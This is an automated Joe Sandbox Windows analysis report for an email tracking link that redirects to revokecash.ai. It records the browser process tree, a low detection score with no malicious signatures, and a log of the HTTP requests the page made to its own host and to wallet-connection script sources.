Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://ctrk.klclick.com/l/01HHA7T34SH51AXCSV6CC50V39_2

Overview

General Information

Sample URL:https://ctrk.klclick.com/l/01HHA7T34SH51AXCSV6CC50V39_2
Analysis ID:1357461
Infos:

Detection

Score:3
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Creates files inside the system directory
HTML body with high number of embedded SVGs detected
HTML body with high number of embedded images detected
HTTP GET or POST without a user agent
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 7160 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5756 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1964,i,2291995251534009458,9676275645718360360,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3772 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6036 --field-trial-handle=1964,i,2291995251534009458,9676275645718360360,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6052 --field-trial-handle=1964,i,2291995251534009458,9676275645718360360,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 5836 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ctrk.klclick.com/l/01HHA7T34SH51AXCSV6CC50V39_2 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: https://boringsecurity.com/HTTP Parser: Total embedded SVG size: 480299
Source: https://boringsecurity.com/HTTP Parser: Total embedded image size: 339054
Source: https://revokecash.ai/learn/faqHTTP Parser: No favicon
Source: https://revokecash.ai/sponsorshipsHTTP Parser: No favicon
Source: https://boringsecurity.com/HTTP Parser: No favicon
Source: https://boringsecurity.com/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49780 version: TLS 1.0
Source: unknownHTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49775 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49962 version: TLS 1.2
Source: global trafficHTTP traffic detected: GET query missing.
Source: global trafficHTTP traffic detected: GET query missing.
Source: global trafficHTTP traffic detected: GET query missing.
Source: global trafficHTTP traffic detected: GET query missing.
Source: global trafficHTTP traffic detected: GET query missing.
Source: global trafficHTTP traffic detected: GET query missing.
Source: global trafficHTTP traffic detected: GET query missing.
Source: global trafficHTTP traffic detected: GET query missing.
Source: global trafficHTTP traffic detected: GET query missing.
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49780 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.132Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /l/01HHA7T34SH51AXCSV6CC50V39_2 HTTP/1.1Host: ctrk.klclick.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&_kx=fw2wQu0PT9c7aWP5IseYWVApjC3AozR_83oxjnwCi-bRLwV3NMDiPj-cT-Od8Ka9.HaDCVL HTTP/1.1Host: revokecash.aiConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_css/10ce1614d91ae5c9.css HTTP/1.1Host: revokecash.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://revokecash.ai/?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&_kx=fw2wQu0PT9c7aWP5IseYWVApjC3AozR_83oxjnwCi-bRLwV3NMDiPj-cT-Od8Ka9.HaDCVLAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_css/56d1f5034e1e3936.css HTTP/1.1Host: revokecash.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://revokecash.ai/?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&_kx=fw2wQu0PT9c7aWP5IseYWVApjC3AozR_83oxjnwCi-bRLwV3NMDiPj-cT-Od8Ka9.HaDCVLAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_css/styles.css HTTP/1.1Host: revokecash.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://revokecash.ai/?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&_kx=fw2wQu0PT9c7aWP5IseYWVApjC3AozR_83oxjnwCi-bRLwV3NMDiPj-cT-Od8Ka9.HaDCVLAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/revoke.svg HTTP/1.1Host: revokecash.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://revokecash.ai/?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&_kx=fw2wQu0PT9c7aWP5IseYWVApjC3AozR_83oxjnwCi-bRLwV3NMDiPj-cT-Od8Ka9.HaDCVLAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /walletConnect.js HTTP/1.1Host: revokecash.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://revokecash.ai/?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&_kx=fw2wQu0PT9c7aWP5IseYWVApjC3AozR_83oxjnwCi-bRLwV3NMDiPj-cT-Od8Ka9.HaDCVLAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/demo-thumb.jpg HTTP/1.1Host: revokecash.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://revokecash.ai/?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&_kx=fw2wQu0PT9c7aWP5IseYWVApjC3AozR_83oxjnwCi-bRLwV3NMDiPj-cT-Od8Ka9.HaDCVLAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/revoke.svg HTTP/1.1Host: revokecash.aiConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/demo-thumb.jpg HTTP/1.1Host: revokecash.aiConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /@web3modal/ethereum@2.7.1 HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /@web3modal/html@2.7.1 HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /@web3modal/html@2.7.1/dist/cdn/bundle.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /@web3modal/ethereum@2.7.1/dist/cdn/bundle.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /@web3modal/ethereum@2.7.1/dist/cdn/bundle-b2289479.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://unpkg.com/@web3modal/ethereum@2.7.1/dist/cdn/bundle.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /@web3modal/html@2.7.1/dist/cdn/bundle-7a116c93.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://unpkg.com/@web3modal/html@2.7.1/dist/cdn/bundle.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /@web3modal/ethereum@2.7.1/dist/cdn/index.es-73b49c04.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://unpkg.com/@web3modal/ethereum@2.7.1/dist/cdn/bundle-b2289479.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /@web3modal/html@2.7.1/dist/cdn/index-fec845d6.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://unpkg.com/@web3modal/html@2.7.1/dist/cdn/bundle-7a116c93.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /init HTTP/1.1Host: revokecash.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://revokecash.ai/?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&_kx=fw2wQu0PT9c7aWP5IseYWVApjC3AozR_83oxjnwCi-bRLwV3NMDiPj-cT-Od8Ka9.HaDCVLAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: revokecash.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://revokecash.ai/?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&_kx=fw2wQu0PT9c7aWP5IseYWVApjC3AozR_83oxjnwCi-bRLwV3NMDiPj-cT-Od8Ka9.HaDCVLAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /@web3modal/ethereum@2.7.1/dist/cdn/__polyfill-node.events-e75a050f.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://unpkg.com/@web3modal/ethereum@2.7.1/dist/cdn/index.es-73b49c04.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w3m/v1/getDesktopListings?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1&page=1&entries=9&version=2 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://revokecash.aiSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w3m/v1/getInjectedListings?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://revokecash.aiSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /init HTTP/1.1Host: revokecash.aiConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
